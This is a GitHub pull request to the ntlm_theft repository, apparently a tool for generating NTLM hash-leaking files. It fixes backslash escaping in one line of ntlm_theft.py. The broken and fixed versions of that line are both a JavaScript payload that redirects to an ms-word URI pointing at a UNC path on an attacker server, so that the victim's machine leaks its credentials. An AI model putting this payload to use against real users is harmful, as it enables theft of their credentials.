Skip to content

fixing improper escaping of backslashes L168 & space formatting#19

Open
schlopshow wants to merge 1 commit into
Greenwolf:masterfrom
schlopshow:fixing-escaped
Open

fixing improper escaping of backslashes L168 & space formatting#19
schlopshow wants to merge 1 commit into
Greenwolf:masterfrom
schlopshow:fixing-escaped

Conversation

@schlopshow
Copy link
Copy Markdown

Improper escaping of chracter at line 168 of ntlm_theft.py

image image

broken code

location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';

fixed code

location.href = 'ms-word:ofe|u|\\''' + server + '''\\leak\\leak.docx';

adding two backslashes fixes the commands escaping in my shell. Not sure if this is a universal problem, but for any shell's that require proper escaping it will cause this error.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant